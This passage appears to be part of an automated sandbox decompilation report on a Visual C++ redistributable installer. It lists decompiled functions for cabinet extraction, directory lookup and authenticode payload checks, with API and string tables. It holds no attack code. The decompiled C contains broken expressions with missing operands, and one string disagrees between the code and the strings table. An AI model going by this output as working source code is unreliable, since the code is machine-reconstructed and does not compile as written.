					_t26 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					_push(_t26);
					_push(0x187);
					goto L11;
				} else {
					_t26 = E0001275D( *_t23,  &_v8);
					if(_t26 < 0) {
						L12:
						return _t26;
					}
					_t6 = _v8;
					if(_t6 != 0) {
						_t18 =  *_t23;
					}
					goto L5;
				}
			}










                                                                          0x00014113
                                                                          0x00014116
                                                                          0x00014119
                                                                          0x0001411b
                                                                          0x0001411e
                                                                          0x00014122
                                                                          0x00014146
                                                                          0x0001414e
                                                                          0x00014152
                                                                          0x0001417d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014186
                                                                          0x0001418a
                                                                          0x000141aa
                                                                          0x000141ad
                                                                          0x000141b4
                                                                          0x000141b7
                                                                          0x000141b8
                                                                          0x000141bd
                                                                          0x000141bd
                                                                          0x000141c2
                                                                          0x000141c2
                                                                          0x00000000
                                                                          0x0001418a
                                                                          0x00014165
                                                                          0x00014168
                                                                          0x0001416f
                                                                          0x00014172
                                                                          0x00014173
                                                                          0x00000000
                                                                          0x00014128
                                                                          0x00014133
                                                                          0x00014137
                                                                          0x000141c7
                                                                          0x000141cf
                                                                          0x000141cf
                                                                          0x0001413d
                                                                          0x00014142
                                                                          0x00014144
                                                                          0x00014144
                                                                          0x00000000
                                                                          0x00014142

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 00014148
                                                                          • GetLastError.KERNEL32(?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001), ref: 00014154
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?), ref: 0001418F
                                                                          • GetLastError.KERNEL32(?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001), ref: 00014199
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryErrorLast
                                                                          • String ID: @Met$crypt32.dll$dirutil.cpp
                                                                          • API String ID: 152501406-140968552
                                                                          • Opcode ID: 4f8e2f1e2ca53eae4bdad1a89228efa09294c51accbc22e9b601f594c5fb3afe
                                                                          • Instruction ID: 430ccff86eaaee4ce001fe1f3705c21f85a891a21459c331235666cccb9e80b6
                                                                          • Opcode Fuzzy Hash: 4f8e2f1e2ca53eae4bdad1a89228efa09294c51accbc22e9b601f594c5fb3afe
                                                                          • Instruction Fuzzy Hash: 2B11B976E00726BBE7219AA98CC4BEBB6ECDF14791B110135FD04E7260E765DC8086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001999B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 50%
                                                                          			E0001999B(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed char _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				void* _t31;

				_v8 = _v8 & 0x00000000;
				_t30 = _a4;
				_t31 = E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0);
				if(_t31 >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0xc], xmm0");
						if((_t18 & 0x00000010) == 0) {
							goto L7;
						} else {
							_t26 = 1;
							_t19 = 0;
							goto L8;
						}
						L16:
					} else {
						_t31 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
						if(_t31 == 0x80070002 || _t31 == 0x80070003) {
							_t31 = 0;
						}
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0xc], xmm0");
						L7:
						_t26 = _v16;
						_t19 = _v12;
					}
					L8:
					if(_t31 >= 0) {
						_t31 = E00018152(_a8,  *((intOrPtr*)(_t30 + 4)), _t26, _t19, 0);
						if(_t31 < 0) {
							_push("Failed to set variable.");
							goto L14;
						}
					} else {
						_push(_v8);
						E0005012F(_t31, "Failed while searching directory search: %ls, for path: %ls",  *_t30);
					}
				} else {
					_push("Failed to format variable string.");
					L14:
					_push(_t31);
					E0005012F();
				}
				E00012793(_v8);
				return _t31;
				goto L16;
			}










                                                                          0x000199a1
                                                                          0x000199aa
                                                                          0x000199bb
                                                                          0x000199bf
                                                                          0x000199ce
                                                                          0x000199d7
                                                                          0x00019a26
                                                                          0x00019a29
                                                                          0x00019a30
                                                                          0x00000000
                                                                          0x00019a32
                                                                          0x00019a34
                                                                          0x00019a35
                                                                          0x00000000
                                                                          0x00019a35
                                                                          0x00000000
                                                                          0x000199d9
                                                                          0x000199ea
                                                                          0x000199f3
                                                                          0x000199fd
                                                                          0x000199fd
                                                                          0x000199ff
                                                                          0x00019a02
                                                                          0x00019a07
                                                                          0x00019a07
                                                                          0x00019a0a
                                                                          0x00019a0a
                                                                          0x00019a0d
                                                                          0x00019a0f
                                                                          0x00019a48
                                                                          0x00019a4c
                                                                          0x00019a4e
                                                                          0x00000000
                                                                          0x00019a4e
                                                                          0x00019a11
                                                                          0x00019a11
                                                                          0x00019a1c
                                                                          0x00019a21
                                                                          0x000199c1
                                                                          0x000199c1
                                                                          0x00019a53
                                                                          0x00019a53
                                                                          0x00019a54
                                                                          0x00019a5a
                                                                          0x00019a5e
                                                                          0x00019a6a
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000199B6
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000199CE
                                                                          • GetLastError.KERNEL32 ref: 000199D9
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019A4E
                                                                          • Failed to format variable string., xrefs: 000199C1
                                                                          • Failed while searching directory search: %ls, for path: %ls, xrefs: 00019A16
                                                                          • @Met, xrefs: 000199D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                          • API String ID: 1811509786-2166368626
                                                                          • Opcode ID: c89956ce63e28282d7bc6d0de5189c44db8b65256e265fe447c17ec8e666af10
                                                                          • Instruction ID: eadd023be1a1a901b674d9034465a95427df3d8fad3eb98aa64e8ee8d152e799
                                                                          • Opcode Fuzzy Hash: c89956ce63e28282d7bc6d0de5189c44db8b65256e265fe447c17ec8e666af10
                                                                          • Instruction Fuzzy Hash: 61210832E40225B7DB119AA8CC12BEEB769EF14321F208316FD10B6191D7315ED49AD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000308F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E000308F0(void* __ecx, void* _a8, long _a12) {
				long _v8;
				intOrPtr _t25;
				signed short _t30;
				intOrPtr _t41;
				signed int _t44;
				struct _OVERLAPPED* _t48;
				long _t54;

				_t44 =  *0x7aac0; // 0x0
				_t48 = 0;
				_v8 = 0;
				_t41 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t44 * 4)) + 4));
				_t25 =  *((intOrPtr*)(_t41 + 0x2c));
				if(_t25 == 0) {
					if(WriteFile( *(_t41 + 0x3c), _a8, _a12,  &_v8, 0) == 0) {
						_t30 = GetLastError();
						_t52 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
						_t48 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x304, _t48);
						_push("Failed to write during cabinet extraction.");
						goto L6;
					}
				} else {
					if(_t25 == 1) {
						_t54 = _a12;
						E00031664( *((intOrPtr*)(_t41 + 0x40)) +  *((intOrPtr*)(_t41 + 0x48)),  *((intOrPtr*)(_t41 + 0x44)) -  *((intOrPtr*)(_t41 + 0x48)), _a8, _t54);
						 *((intOrPtr*)(_t41 + 0x48)) =  *((intOrPtr*)(_t41 + 0x48)) + _t54;
						_v8 = _t54;
					} else {
						_t48 = 0x8007139f;
						_push("Unexpected call to CabWrite().");
						L6:
						E0005012F();
						_t44 = _t48;
					}
				}
				 *((intOrPtr*)(_t41 + 0x30)) = _t48;
				_t29 =  <  ? _t44 | 0xffffffff : _v8;
				return  <  ? _t44 | 0xffffffff : _v8;
			}










                                                                          0x000308f4
                                                                          0x00030902
                                                                          0x00030907
                                                                          0x0003090a
                                                                          0x00030914
                                                                          0x00030917
                                                                          0x00030967
                                                                          0x00030969
                                                                          0x0003097a
                                                                          0x00030984
                                                                          0x00030992
                                                                          0x00030997
                                                                          0x00000000
                                                                          0x00030997
                                                                          0x00030919
                                                                          0x0003091c
                                                                          0x00030931
                                                                          0x00030940
                                                                          0x00030948
                                                                          0x0003094b
                                                                          0x0003091e
                                                                          0x0003091e
                                                                          0x00030923
                                                                          0x0003099c
                                                                          0x0003099d
                                                                          0x000309a3
                                                                          0x000309a3
                                                                          0x0003091c
                                                                          0x000309a4
                                                                          0x000309b0
                                                                          0x000309b7

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                          • String ID: @Met$Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                          • API String ID: 1970631241-130182655
                                                                          • Opcode ID: b426a8d3aa98ec1ed94cf42dc22742475f138152535a64b5ff4a979bb17b9b96
                                                                          • Instruction ID: 45b3f1c7a4f98ab6f02716c1afb5afd198e16bdeaf1edd28ec91e7dcfe7aacd1
                                                                          • Opcode Fuzzy Hash: b426a8d3aa98ec1ed94cf42dc22742475f138152535a64b5ff4a979bb17b9b96
                                                                          • Instruction Fuzzy Hash: 0C21CD76600204EFEB01DF6DDD84EAA37EDEF89320F11005AFE08DB252D631DA008B61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000509BB Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 61%
                                                                          			E000509BB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				_Unknown_base(*)()* _t7;
				char _t18;

				_t18 = 0;
				_v8 = 0;
				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t7 == 0) {
					L3:
					 *_a8 = _v8;
				} else {
					_push( &_v8);
					_push(_a4);
					if( *_t7() != 0) {
						goto L3;
					} else {
						_t22 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "procutil.cpp", 0x4e, _t18);
					}
				}
				return _t18;
			}






                                                                          0x000509c5
                                                                          0x000509cc
                                                                          0x000509d6
                                                                          0x000509de
                                                                          0x00050a1a
                                                                          0x00050a20
                                                                          0x000509e0
                                                                          0x000509e3
                                                                          0x000509e4
                                                                          0x000509eb
                                                                          0x00000000
                                                                          0x000509ed
                                                                          0x000509fe
                                                                          0x00050a08
                                                                          0x00050a13
                                                                          0x00050a13
                                                                          0x000509eb
                                                                          0x00050a28

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                          • GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                          • String ID: @Met$IsWow64Process$kernel32$procutil.cpp
                                                                          • API String ID: 4275029093-3284291680
                                                                          • Opcode ID: 9208a02ad799bb963d2a9d6b9341110e6e5c9795db2eca0013bcc526a301ef4b
                                                                          • Instruction ID: 220e462e58b7c952be8f5586ec1d53cb7dba08d082b986da1612df2fcd5ac727
                                                                          • Opcode Fuzzy Hash: 9208a02ad799bb963d2a9d6b9341110e6e5c9795db2eca0013bcc526a301ef4b
                                                                          • Instruction Fuzzy Hash: 5BF06276A00725AFE7209FA5DC09AAFBA98EF04752B008115FD09EB280E775DE04C7E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002A998 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 47%
                                                                          			E0002A998(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				intOrPtr _v80;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				signed short _t40;
				signed short _t45;
				signed short _t48;
				void* _t63;
				char _t65;
				signed int _t77;

				_t63 = __edx;
				_t32 =  *0x7a008; // 0xfbf51acb
				_v8 = _t32 ^ _t77;
				_v28 = _a4;
				_t55 = _a8;
				asm("stosd");
				_v24 = 0xaac56b;
				_v20 = 0x11d0cd44;
				asm("stosd");
				_v16 = 0xc000c28c;
				_v12 = 0xee95c24f;
				asm("stosd");
				asm("stosd");
				_t65 = 0x30;
				E0003F670(_t65,  &_v92, 0, _t65);
				_v44 = 0x10;
				_v40 = _a8;
				_v68 =  &_v44;
				_v36 = _a12;
				_push( &_v92);
				_t40 =  &_v24;
				_v92 = _t65;
				_v52 = 0x80;
				_push(_t40);
				_push(0xffffffff);
				_v72 = 1;
				_v64 = 1;
				_v80 = 2;
				L0004F42C();
				if(_t40 == 0) {
					L3:
					_push(_v60);
					L0004F44C();
					if(_t40 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(_t40);
						L0004F43C();
						if(_t40 != 0) {
							_t67 = E00029080(_v28,  *((intOrPtr*)(_t40 + 0x28)));
							if(_t67 < 0) {
								_push("Failed to verify expected payload against actual certificate chain.");
								goto L9;
							}
						} else {
							_t45 = GetLastError();
							_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
							_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "cache.cpp", 0x3f0, _t67);
							_push("Failed to get signer chain from authenticode certificate.");
							goto L9;
						}
					} else {
						_t48 = GetLastError();
						_t73 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t67 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cache.cpp", 0x3ed, _t67);
						_push("Failed to get provider state from authenticode certificate.");
						L9:
						_push(_t67);
						E0005012F();
					}
				} else {
					_v52 = _v52 | 0x00001000;
					_push( &_v92);
					_t40 =  &_v24;
					_push(_t40);
					_push(0xffffffff);
					L0004F42C();
					if(_t40 == 0) {
						goto L3;
					} else {
						_t76 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
						_t67 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cache.cpp", 0x3e9,  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000);
						E0005012F( >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000, "Failed authenticode verification of payload: %ls", _t55);
					}
				}
				return E0003DE36(_t55, _v8 ^ _t77, _t63, _t65, _t67);
			}






























                                                                          0x0002a998
                                                                          0x0002a99e
                                                                          0x0002a9a5
                                                                          0x0002a9ae
                                                                          0x0002a9b4
                                                                          0x0002a9bc
                                                                          0x0002a9bf
                                                                          0x0002a9c6
                                                                          0x0002a9cd
                                                                          0x0002a9ce
                                                                          0x0002a9d5
                                                                          0x0002a9dc
                                                                          0x0002a9dd
                                                                          0x0002a9e1
                                                                          0x0002a9e6
                                                                          0x0002a9ee
                                                                          0x0002a9f8
                                                                          0x0002a9fb
                                                                          0x0002aa03
                                                                          0x0002aa06
                                                                          0x0002aa07
                                                                          0x0002aa0a
                                                                          0x0002aa0e
                                                                          0x0002aa15
                                                                          0x0002aa16
                                                                          0x0002aa18
                                                                          0x0002aa1b
                                                                          0x0002aa1e
                                                                          0x0002aa25
                                                                          0x0002aa2c
                                                                          0x0002aa84
                                                                          0x0002aa84
                                                                          0x0002aa87
                                                                          0x0002aa8e
                                                                          0x0002aac7
                                                                          0x0002aac8
                                                                          0x0002aac9
                                                                          0x0002aaca
                                                                          0x0002aacb
                                                                          0x0002aad2
                                                                          0x0002ab14
                                                                          0x0002ab18
                                                                          0x0002ab1a
                                                                          0x00000000
                                                                          0x0002ab1a
                                                                          0x0002aad4
                                                                          0x0002aad4
                                                                          0x0002aae5
                                                                          0x0002aaef
                                                                          0x0002aafd
                                                                          0x0002ab02
                                                                          0x00000000
                                                                          0x0002ab02
                                                                          0x0002aa90
                                                                          0x0002aa90
                                                                          0x0002aaa1
                                                                          0x0002aaab
                                                                          0x0002aab9
                                                                          0x0002aabe
                                                                          0x0002ab1f
                                                                          0x0002ab1f
                                                                          0x0002ab20
                                                                          0x0002ab26
                                                                          0x0002aa2e
                                                                          0x0002aa2e
                                                                          0x0002aa38
                                                                          0x0002aa39
                                                                          0x0002aa3c
                                                                          0x0002aa3d
                                                                          0x0002aa3f
                                                                          0x0002aa46
                                                                          0x00000000
                                                                          0x0002aa48
                                                                          0x0002aa53
                                                                          0x0002aa5d
                                                                          0x0002aa6b
                                                                          0x0002aa77
                                                                          0x0002aa7c
                                                                          0x0002aa46
                                                                          0x0002ab39

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,000000FF,00AAC56B,?,000152B5,00000000,0001533D), ref: 0002AA90
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00AAC56B,?,000152B5,00000000,0001533D), ref: 0002AAD4
                                                                          Strings
                                                                          • Failed to verify expected payload against actual certificate chain., xrefs: 0002AB1A
                                                                          • Failed to get signer chain from authenticode certificate., xrefs: 0002AB02
                                                                          • cache.cpp, xrefs: 0002AA66, 0002AAB4, 0002AAF8
                                                                          • Failed to get provider state from authenticode certificate., xrefs: 0002AABE
                                                                          • @Met, xrefs: 0002AA90, 0002AAD4
                                                                          • Failed authenticode verification of payload: %ls, xrefs: 0002AA71
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                          • API String ID: 1452528299-1404453347
                                                                          • Opcode ID: 98276ab43d3a45a3ac4478ceb17ee4e9a80875e0e8d402434fb5db14f80acf53
                                                                          • Instruction ID: ffbe794aa4a11180cdde3ebe760ed937a42870d08192dd1e97994a5f2731a889
                                                                          • Opcode Fuzzy Hash: 98276ab43d3a45a3ac4478ceb17ee4e9a80875e0e8d402434fb5db14f80acf53
                                                                          • Instruction Fuzzy Hash: 0C41DAB1E00329ABEB119BA9DD46BEF7BE8EF05310F00012AFD05F7181DB35994486E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002F586 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 21%
                                                                          			E0002F586(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				intOrPtr* _t46;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t62;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = 0;
				_v8 = 0;
				EnterCriticalSection( *(_a4 + 0xc));
				_t62 = E0001D459( *(_a4 + 0xc) + 0xb8);
				if(_t62 >= 0) {
					_t46 = _a16;
					if(_t46 == 0 ||  *_t46 == 0) {
						L20:
						_t62 = 0x80070057;
					} else {
						_t58 = _a12;
						if(_t58 == 0 ||  *_t58 == 0) {
							_t59 = _a8;
							if(_t59 == 0 ||  *_t59 == 0) {
								goto L20;
							} else {
								_t62 = E0001C0A9(_t48,  *(_a4 + 0xc) + 0x2a8, _t59,  &_v12);
								if(_t62 >= 0) {
									_t62 = E000121A5(_v12 + 0x28, _t46, 0);
									if(_t62 < 0) {
										_push("Failed to set source path for container.");
										goto L19;
									}
								} else {
									_push(_t59);
									_push("UX requested unknown container with id: %ls");
									goto L16;
								}
							}
						} else {
							_t62 = E0001CC57(_t48,  *(_a4 + 0xc) + 0x2b8, _t58,  &_v8);
							if(_t62 >= 0) {
								_t41 = _v8;
								if( *((intOrPtr*)(_v8 + 4)) != 2) {
									_t62 = E000121A5(_t41 + 0x38, _t46, 0);
									if(_t62 < 0) {
										_push("Failed to set source path for payload.");
										L19:
										_push(_t62);
										E0005012F();
									}
								} else {
									_push(_t58);
									_t62 = 0x800710dd;
									_push("UX denied while trying to set source on embedded payload: %ls");
									goto L16;
								}
							} else {
								_push(_t58);
								_push("UX requested unknown payload with id: %ls");
								L16:
								_push(_t62);
								E0005012F();
							}
						}
					}
				} else {
					_push("Engine is active, cannot change engine state.");
					_push(_t62);
					E0005012F();
				}
				LeaveCriticalSection( *(_a4 + 0xc));
				return _t62;
			}









                                                                          0x0002f586
                                                                          0x0002f589
                                                                          0x0002f58a
                                                                          0x0002f592
                                                                          0x0002f598
                                                                          0x0002f59b
                                                                          0x0002f5af
                                                                          0x0002f5b3
                                                                          0x0002f5c8
                                                                          0x0002f5cd
                                                                          0x0002f69c
                                                                          0x0002f69c
                                                                          0x0002f5dc
                                                                          0x0002f5dc
                                                                          0x0002f5e3
                                                                          0x0002f63e
                                                                          0x0002f643
                                                                          0x00000000
                                                                          0x0002f64a
                                                                          0x0002f660
                                                                          0x0002f664
                                                                          0x0002f687
                                                                          0x0002f68b
                                                                          0x0002f68d
                                                                          0x00000000
                                                                          0x0002f68d
                                                                          0x0002f666
                                                                          0x0002f666
                                                                          0x0002f667
                                                                          0x00000000
                                                                          0x0002f667
                                                                          0x0002f664
                                                                          0x0002f5ea
                                                                          0x0002f600
                                                                          0x0002f604
                                                                          0x0002f60e
                                                                          0x0002f615
                                                                          0x0002f631
                                                                          0x0002f635
                                                                          0x0002f637
                                                                          0x0002f692
                                                                          0x0002f692
                                                                          0x0002f693
                                                                          0x0002f699
                                                                          0x0002f617
                                                                          0x0002f617
                                                                          0x0002f618
                                                                          0x0002f61d
                                                                          0x00000000
                                                                          0x0002f61d
                                                                          0x0002f606
                                                                          0x0002f606
                                                                          0x0002f607
                                                                          0x0002f66c
                                                                          0x0002f66c
                                                                          0x0002f66d
                                                                          0x0002f672
                                                                          0x0002f604
                                                                          0x0002f5e3
                                                                          0x0002f5b5
                                                                          0x0002f5b5
                                                                          0x0002f5ba
                                                                          0x0002f5bb
                                                                          0x0002f5c1
                                                                          0x0002f6a8
                                                                          0x0002f6b5

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F59B
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002F6A8
                                                                          Strings
                                                                          • user is active, cannot change user state., xrefs: 0002F5B5
                                                                          • UX denied while trying to set source on embedded payload: %ls, xrefs: 0002F61D
                                                                          • Failed to set source path for container., xrefs: 0002F68D
                                                                          • UX requested unknown container with id: %ls, xrefs: 0002F667
                                                                          • UX requested unknown payload with id: %ls, xrefs: 0002F607
                                                                          • Failed to set source path for payload., xrefs: 0002F637
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: user is active, cannot change user state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                          • API String ID: 3168844106-4121889706
                                                                          • Opcode ID: 5e1e15705ce1926582ce2cba9e5a2d4528ad56ebd50632dc9cd246875f79531f
                                                                          • Instruction ID: 210d8c36afd05f9281813a6554272ae24be43f3ec1240a1e30cad884a3fd161d
                                                                          • Opcode Fuzzy Hash: 5e1e15705ce1926582ce2cba9e5a2d4528ad56ebd50632dc9cd246875f79531f
                                                                          • Instruction Fuzzy Hash: F4311472A40622AB9B219B54EC0ADBF73FDEF54760B14403AFC04EB211DB74ED408B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000170D4 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 49%
                                                                          			E000170D4(void* __ebx, void* __ecx, WCHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _t38;
				WCHAR* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t54;

				_t40 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t48 = _a4;
				_t52 = E00011EDE( &_v8, lstrlenW(_t48) + 1);
				if(_t52 >= 0) {
					while(1) {
